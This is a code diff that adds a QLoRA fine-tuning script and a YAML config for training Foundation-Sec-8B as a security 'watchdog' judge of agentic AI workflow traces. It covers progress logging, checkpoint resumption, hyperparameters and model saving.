+    def on_log(self, args, state, control, logs=None, **kwargs):
+        if logs is None:
+            return
+        current_step = state.global_step
+        if current_step == 0 or current_step == self.last_update:
+            return
+        self.last_update = current_step
+        # Record metrics
+        if 'loss' in logs:
+            self.losses.append(logs['loss'])
+        # Calculate progress
+        progress = current_step / self.total_steps
+        elapsed = time.time() - self.start_time
+        # Estimate remaining time
+        if current_step > 0:
+            avg_time_per_step = elapsed / current_step
+            remaining_steps = self.total_steps - current_step
+            eta_seconds = avg_time_per_step * remaining_steps
+            eta = str(timedelta(seconds=int(eta_seconds)))
+        else:
+            eta = "calculating..."
+        # Progress bar (50 chars wide)
+        bar_length = 50
+        filled = int(bar_length * progress)
+        bar = '█' * filled + '░' * (bar_length - filled)
+        # Clear line and print progress
+        sys.stdout.write('\r\033[K')  # Clear line
+        # Main progress line
+        progress_line = f"Progress: [{bar}] {progress*100:.1f}% | Step {current_step}/{self.total_steps}"
+        print(progress_line)
+        # Metrics line
+        loss_str = f"{logs.get('loss', 0):.4f}" if 'loss' in logs else "N/A"
+        lr_str = f"{logs.get('learning_rate', 0):.2e}" if 'learning_rate' in logs else "N/A"
+        metrics_line = f"Loss: {loss_str} | LR: {lr_str} | Elapsed: {str(timedelta(seconds=int(elapsed)))} | ETA: {eta}"
+        print(metrics_line)
+        # Mini loss graph (last 20 steps)
+        if len(self.losses) > 1:
+            self._print_mini_graph()
+        print()  # New line for next update
+    def _print_mini_graph(self):
+        """Print a simple ASCII graph of recent losses"""
+        recent_losses = self.losses[-20:]  # Last 20 losses
+        if len(recent_losses) < 2:
+            return
+        # Normalize to 0-10 range for display
+        min_loss = min(recent_losses)
+        max_loss = max(recent_losses)
+        range_loss = max_loss - min_loss if max_loss > min_loss else 1
+        graph_height = 5
+        graph = [[] for _ in range(graph_height)]
+        for loss in recent_losses:
+            normalized = (loss - min_loss) / range_loss
+            level = int(normalized * (graph_height - 1))
+            for i in range(graph_height):
+                if i == (graph_height - 1 - level):
+                    graph[i].append('●')
+                else:
+                    graph[i].append(' ')
+        print("\nLoss Trend (last 20 steps):")
+        print(f"  {max_loss:.4f} ┤" + ''.join(graph[0]))
+        for i in range(1, graph_height - 1):
+            print("         │" + ''.join(graph[i]))
+        print(f"  {min_loss:.4f} └" + '─' * len(recent_losses))
+    def on_train_end(self, args, state, control, **kwargs):
+        total_time = time.time() - self.start_time
+        print("\n" + "="*80)
+        print("Training Completed: {}".format(datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
+        print("="*80)
+        print(f"Total training time: {str(timedelta(seconds=int(total_time)))}")
+        print(f"Average time per step: {total_time/self.total_steps:.2f}s")
+        if self.losses:
+            print(f"Final loss: {self.losses[-1]:.4f}")
+            print(f"Best loss: {min(self.losses):.4f}")
+        print("="*80 + "\n")
+print("="*80)
+print("LLM-as-a-Judge Watchdog Training - Comprehensive Security & Evaluation")
+print("NVIDIA DGX Spark - Unsloth Optimized Training")
+print("="*80)
+# Configuration optimized for DGX Spark (128 GB unified memory)
+max_seq_length = 8192  # Foundation-Sec supports up to 64k
+dtype = None  # Auto-detect (will use bfloat16 on DGX Spark)
+load_in_4bit = True  # QLoRA for memory efficiency
+print("\n[1/6] Loading Foundation-Sec-1.1-8B-Instruct model...")
+print(f"  - Max sequence length: {max_seq_length}")
+print(f"  - Quantization: 4-bit (QLoRA)")
+# Load the model from Hugging Face
+model, tokenizer = FastLanguageModel.from_pretrained(
+    model_name = "fdtn-ai/Foundation-Sec-1.1-8B-Instruct",
+    max_seq_length = max_seq_length,
+    dtype = dtype,
+    load_in_4bit = load_in_4bit,
+)
+print("✓ Model loaded successfully")
+print("\n[2/6] Applying LoRA adapters for efficient fine-tuning...")
+# Apply LoRA for parameter-efficient fine-tuning
+model = FastLanguageModel.get_peft_model(
+    model,
+    r = 16,  # LoRA rank (higher = more parameters, better quality)
+    target_modules = ["q_proj", "k_proj", "v_proj", "o_proj",
+                      "gate_proj", "up_proj", "down_proj"],
+    lora_alpha = 16,
+    lora_dropout = 0.05,
+    bias = "none",
+    use_gradient_checkpointing = "unsloth",  # Unsloth's memory optimization
+    random_state = 3407,
+)
+print("✓ LoRA adapters applied")
+print("\n[3/6] Loading and formatting training data...")
+# Formatting function for Llama 3.1 chat template
+def formatting_prompts_func(examples):
+    instructions = examples["instruction"]
+    responses = examples["response"]
+    texts = []
+    for instruction, response in zip(instructions, responses):
+        # Llama 3.1 Instruct format
+        text = f"""<|begin_of_text|><|start_header_id|>system<|end_header_id|>
+You are a cybersecurity AI assistant specialized in analyzing agentic workflow executions for security threats and vulnerabilities. You have deep expertise in:
+- Detecting multi-step attack patterns in autonomous AI systems
+- Analyzing attack propagation through complex workflows
+- Assessing the effectiveness of security guardrails
+- Providing actionable security recommendations
+Your analysis should be thorough, technically accurate, and focused on protecting enterprise agentic AI deployments.<|eot_id|><|start_header_id|>user<|end_header_id|>
+{instruction}<|eot_id|><|start_header_id|>assistant<|end_header_id|>
+{response}<|eot_id|>"""
+        texts.append(text)
+    return {"text": texts}
+# Load training dataset
+print("Loading dataset from: ./training_data_v3_synthetic.jsonl")
+dataset = load_dataset('json', data_files='./training_data_v3_synthetic.jsonl', split='train')
+dataset = dataset.map(formatting_prompts_func, batched=True)
+print(f"✓ Training dataset loaded: {len(dataset):,} examples")
+print(f"  Dataset size: {os.path.getsize('./training_data_v3_synthetic.jsonl') / (1024*1024):.1f} MB")
+print("\n[4/6] Configuring training parameters...")
+# Training configuration optimized for DGX Spark
+max_training_steps = 1500  # Total training steps for comprehensive dataset
+training_args = TrainingArguments(
+    per_device_train_batch_size = 2,      # Batch size per device
+    gradient_accumulation_steps = 4,       # Effective batch size = 2 * 4 = 8
+    warmup_steps = 100,                    # Warmup for stable training
+    max_steps = max_training_steps,        # Total training steps
+    learning_rate = 2e-4,                  # Learning rate for AdamW
+    fp16 = not torch.cuda.is_bf16_supported(),
+    bf16 = torch.cuda.is_bf16_supported(), # Use BF16 on DGX Spark
+    logging_steps = 1,                     # Log every step for progress tracking
+    optim = "adamw_8bit",                  # 8-bit Adam for memory efficiency
+    weight_decay = 0.01,                   # Regularization
+    lr_scheduler_type = "linear",          # Linear learning rate decay
+    seed = 3407,
+    output_dir = "./outputs",
+    save_strategy = "steps",
+    save_steps = 250,                      # Save checkpoint every 250 steps
+    save_total_limit = 3,                  # Keep only 3 most recent checkpoints
+    report_to = "none",                    # Disable W&B/tensorboard
+    disable_tqdm = True,                   # Disable default tqdm (we have custom progress)
+)
+print("✓ Training configuration set")
+print(f"  - Effective batch size: {training_args.per_device_train_batch_size * training_args.gradient_accumulation_steps}")
+print(f"  - Total steps: {training_args.max_steps:,}")
+print(f"  - Learning rate: {training_args.learning_rate}")
+print(f"  - Dataset: Security (63%) + Judge (37%) = {len(dataset):,} examples")
+print(f"  - Estimated time: 4-6 hours (~10-15 sec/step)")
+print("\n[5/6] Initializing SFTTrainer with progress tracking...")
+# Create progress callback
+progress_callback = ProgressCallback(total_steps=max_training_steps)
+# Create trainer
+trainer = SFTTrainer(
+    model = model,
+    tokenizer = tokenizer,
+    train_dataset = dataset,
+    dataset_text_field = "text",
+    max_seq_length = max_seq_length,
+    dataset_num_proc = 2,
+    packing = False,  # Disable packing for clearer learning
+    args = training_args,
+    callbacks = [progress_callback],
+)
+print("✓ Trainer initialized with progress monitoring")
+print("\n[6/6] Starting fine-tuning...")
+# Check for existing checkpoints
+checkpoint_dir = None
+if os.path.exists("./outputs"):
+    checkpoints = [d for d in os.listdir("./outputs") if d.startswith("checkpoint-")]
+    if checkpoints:
+        # Get the latest checkpoint by step number
+        latest_checkpoint = sorted(checkpoints, key=lambda x: int(x.split("-")[1]))[-1]
+        checkpoint_dir = os.path.join("./outputs", latest_checkpoint)
+        checkpoint_step = int(latest_checkpoint.split("-")[1])
+        print("="*80)
+        print("🔄 RESUMING FROM CHECKPOINT")
+        print("="*80)
+        print(f"Found checkpoint: {latest_checkpoint}")
+        print(f"Resuming from step: {checkpoint_step:,}/{max_training_steps:,}")
+        print(f"Remaining steps: {max_training_steps - checkpoint_step:,}")
+        print(f"Progress saved: {checkpoint_step/max_training_steps*100:.1f}%")
+        print("="*80 + "\n")
+else:
+    print("="*80)
+    print("Training LLM-as-a-Judge Watchdog Model")
+    print(f"Total examples: {len(dataset):,} | Steps: {max_training_steps:,}")
+    print("Estimated duration: 4-6 hours (~10-15 sec/step)")
+    print("Monitor GPU: nvidia-smi")
+    print("="*80)
+# Train the model with error handling
+try:
+    if checkpoint_dir:
+        trainer_stats = trainer.train(resume_from_checkpoint=checkpoint_dir)
+    else:
+        trainer_stats = trainer.train()
+    progress_callback.crashed = False
+except KeyboardInterrupt:
+    print("\n\n" + "="*80)
+    print("⚠️  TRAINING INTERRUPTED BY USER")
+    print("="*80)
+    # Find latest checkpoint
+    if os.path.exists("./outputs"):
+        checkpoints = [d for d in os.listdir("./outputs") if d.startswith("checkpoint-")]
+        if checkpoints:
+            latest = sorted(checkpoints, key=lambda x: int(x.split("-")[1]))[-1]
+            step = int(latest.split("-")[1])
+            print(f"\n✓ Progress saved up to step {step:,}/{max_training_steps:,}")
+            print(f"✓ Checkpoint: ./outputs/{latest}")
+            print(f"\n🔄 To resume: Just run this script again")
+            print(f"   Progress will automatically resume from step {step:,}")
+        else:
+            print("\n⚠️  No checkpoints found. Training was in early stages.")
+    print("="*80 + "\n")
+    progress_callback.crashed = True
+    raise
+except Exception as e:
+    print("\n\n" + "="*80)
+    print("❌ TRAINING FAILED - ERROR DETECTED")
+    print("="*80)
+    print(f"Error: {str(e)}")
+    # Check for saved checkpoints
+    if os.path.exists("./outputs"):
+        checkpoints = [d for d in os.listdir("./outputs") if d.startswith("checkpoint-")]
+        if checkpoints:
+            latest = sorted(checkpoints, key=lambda x: int(x.split("-")[1]))[-1]
+            step = int(latest.split("-")[1])
+            print(f"\n✓ Progress saved up to step {step:,}/{max_training_steps:,}")
+            print(f"✓ You can resume from: ./outputs/{latest}")
+    print("\nError details saved to: training_error.log")
+    with open("training_error.log", "w") as f:
+        f.write(f"Training failed at: {datetime.now()}\n")
+        f.write(f"Error: {str(e)}\n")
+        import traceback
+        f.write(traceback.format_exc())
+    print("="*80 + "\n")
+    progress_callback.crashed = True
+    raise
+print("\n" + "="*80)
+print("Fine-tuning completed!")
+print("="*80)
+print("\n[Saving] Saving fine-tuned model...")
+# Save LoRA adapters
+model.save_pretrained("./agentic-safety-foundation-sec-lora")
+tokenizer.save_pretrained("./agentic-safety-foundation-sec-lora")
+print("✓ LoRA adapters saved to: ./agentic-safety-foundation-sec-lora")
+# Save merged model (optional - full precision)
+print("\n[Saving] Merging and saving full model...")
+model.save_pretrained_merged(
+    "./agentic-safety-foundation-sec-merged",
+    tokenizer,
+    save_method = "merged_16bit",  # Save in 16-bit for quality
+)
+print("✓ Merged model saved to: ./agentic-safety-foundation-sec-merged")
+print("\n" + "="*80)
+print("Training Statistics:")
+print("="*80)
+print(trainer_stats)
+print("\n✓ All outputs saved successfully!")
+print("\nCheckpoint Information:")
+print("  - Checkpoints saved every 250 steps to: ./outputs/")
+print("  - Last 3 checkpoints are kept automatically")
+print("  - To resume interrupted training: Just run this script again")
+print("\nNext steps:")
+print("1. Test the model with: python test_model.py")
+print("2. Convert to GGUF for deployment (optional)")
+print("3. Deploy with production_inference.py")
+# Save the file and run it
+# python finetune_foundation_sec.py

training_config.yaml ADDED Viewed

	@@ -0,0 +1,196 @@

+# Training Configuration - Foundation-Sec
+# Model Configuration
+base_model: "meta-llama/Llama-3.1-8B-Instruct"
+model_type: "causal_lm"
+torch_dtype: "float16"
+attn_implementation: "flash_attention_2"  # 2x faster than standard attention
+# QLoRA Configuration
+lora_config:
+  r: 64                    # LoRA rank (higher = more parameters, better quality)
+  lora_alpha: 128          # LoRA scaling factor (typically 2x r)
+  lora_dropout: 0.1        # Dropout for LoRA layers
+  bias: "none"             # Don't add bias terms
+  task_type: "CAUSAL_LM"
+  # Target modules for LoRA adaptation
+  target_modules:
+    - "q_proj"             # Query projection
+    - "k_proj"             # Key projection
+    - "v_proj"             # Value projection
+    - "o_proj"             # Output projection
+    - "gate_proj"          # MLP gate
+    - "up_proj"            # MLP up projection
+    - "down_proj"          # MLP down projection
+# Quantization Configuration (4-bit)
+bnb_config:
+  load_in_4bit: true                    # Enable 4-bit quantization
+  bnb_4bit_quant_type: "nf4"            # NormalFloat 4-bit
+  bnb_4bit_use_double_quant: true       # Double quantization for efficiency
+  bnb_4bit_compute_dtype: "float16"     # Compute in FP16
+# Training Hyperparameters
+training:
+  # Dataset
+  dataset_path: "datasets/training_data_v3_synthetic.jsonl"
+  max_seq_length: 2048                  # Maximum sequence length
+  # Training schedule
+  num_epochs: 3                         # Number of training epochs
+  max_steps: -1                         # -1 = train for full epochs
+  # Batch size and accumulation
+  per_device_train_batch_size: 4        # Batch size per GPU
+  gradient_accumulation_steps: 4        # Effective batch = 4 * 4 = 16
+  # Optimization
+  learning_rate: 0.0002                 # 2e-4 (standard for QLoRA)
+  weight_decay: 0.01                    # L2 regularization
+  lr_scheduler_type: "cosine"           # Cosine annealing
+  warmup_ratio: 0.03                    # 3% warmup steps
+  # Optimizer
+  optimizer: "paged_adamw_8bit"         # Memory-efficient AdamW
+  adam_beta1: 0.9
+  adam_beta2: 0.999
+  adam_epsilon: 1.0e-8
+  max_grad_norm: 1.0                    # Gradient clipping
+  # Mixed precision
+  fp16: true                            # Enable FP16 training
+  bf16: false                           # BF16 not available on all GPUs
+  # Memory optimization
+  gradient_checkpointing: true          # Reduces memory by 30-40%
+  optim: "paged_adamw_8bit"            # Paged optimizer for memory efficiency
+# Logging and Checkpointing
+logging:
+  logging_dir: "logs/training"
+  logging_strategy: "steps"
+  logging_steps: 50                     # Log every 50 steps
+  report_to: "tensorboard"              # Or "wandb" for Weights & Biases
+  # Evaluation during training
+  evaluation_strategy: "steps"          # Evaluate periodically
+  eval_steps: 500                       # Evaluate every 500 steps
+  per_device_eval_batch_size: 8         # Larger batch for eval (no gradients)
+  # Checkpointing
+  save_strategy: "steps"
+  save_steps: 500                       # Save checkpoint every 500 steps
+  save_total_limit: 3                   # Keep only last 3 checkpoints
+  load_best_model_at_end: true          # Load best checkpoint at end
+  metric_for_best_model: "eval_loss"    # Metric to determine best model
+  greater_is_better: false              # Lower loss is better
+# Output Configuration
+output:
+  output_dir: "output_models/foundation-sec-v3"
+  overwrite_output_dir: false           # Don't overwrite existing checkpoints
+  push_to_hub: false                    # Set to true to push to HuggingFace
+  hub_model_id: "guerilla7/Foundation-Sec-8B-Instruct"
+  hub_strategy: "every_save"            # Push on every checkpoint
+# Data Processing
+data:
+  # Preprocessing
+  num_proc: 8                           # Parallel preprocessing workers
+  streaming: false                      # Load full dataset into memory
+  # Data formatting
+  formatting_func: "format_chat_template"  # Use Llama 3.1 chat template
+  response_template: "<|start_header_id|>assistant<|end_header_id|>"
+  # Validation split
+  validation_split: 0.05                # 5% for validation
+  seed: 42                              # Random seed for reproducibility
+# Performance Optimization
+performance:
+  # DataLoader
+  dataloader_num_workers: 8             # Parallel data loading
+  dataloader_pin_memory: true           # Pin memory for faster GPU transfer
+  dataloader_prefetch_factor: 2         # Prefetch batches
+  # Distributed training (if multi-GPU)
+  ddp_find_unused_parameters: false
+  ddp_backend: "nccl"                   # NVIDIA Collective Communications Library
+  # Compilation (PyTorch 2.0+)
+  torch_compile: false                  # Set to true for 10-20% speedup
+  # Gradient accumulation optimization
+  gradient_accumulation_kwargs:
+    use_reentrant: false                # More memory efficient
+# Hardware Configuration
+hardware:
+  # GPU settings
+  device_map: "auto"                    # Automatic device placement
+  max_memory:
+    0: "95GB"                           # Reserve 1GB for system overhead
+  # CUDA settings
+  cuda_visible_devices: "0"             # Use first GPU only
+  # Environment variables (set in shell)
+  # PYTORCH_CUDA_ALLOC_CONF: "max_split_size_mb:512"
+  # TOKENIZERS_PARALLELISM: "false"
+  # VLLM_USE_TRITON_FLASH_ATTN: "0"
+  # VLLM_ATTENTION_BACKEND: "TORCH_SDPA"
+# Reproducibility
+reproducibility:
+  seed: 42
+  deterministic: false                  # Set to true for full reproducibility (slower)
+# Advanced Settings
+advanced:
+  # Experimental features
+  use_flash_attention_2: true           # Enable Flash Attention 2
+  use_cache: false                      # Disable KV cache during training
+  # DeepSpeed (optional, for multi-GPU)
+  deepspeed: null                       # Path to DeepSpeed config if needed
+  # FSDP (optional, for very large models)
+  fsdp: null                            # Fully Sharded Data Parallel config
+# Custom Evaluation
+custom_eval:
+  # Run custom evaluation after training
+  enabled: true
+  # MMLU Security Studies
+  mmlu:
+    enabled: true
+    tasks: ["mmlu_security_studies"]
+    batch_size: 16
+  # Custom MCQA
+  mcqa:
+    enabled: true
+    task_file: "configs/cybersecurity_mcqa.yaml"
+    batch_size: 16
+  # Trace Security
+  trace_security:
+    enabled: true
+    benign_traces: "evaluation/benign_traces.json"
+    malicious_traces: "evaluation/malicious_traces.json"
+# Notes
+# ------
+# Total parameters: ~8B
+# Trainable parameters: ~33.5M (0.4% via QLoRA)
+# Peak memory usage: ~24GB VRAM
+# Training time: ~8 hours on NVIDIA Blackwell GPU
+# Dataset: 80,851 examples
+# Effective batch size: 16 (4 per device × 4 accumulation)
+# Total training steps: ~15,000 (80,851 / 16 * 3 epochs)
+# GPU utilization: ~85-95%
+# Expected final loss: ~0.45-0.55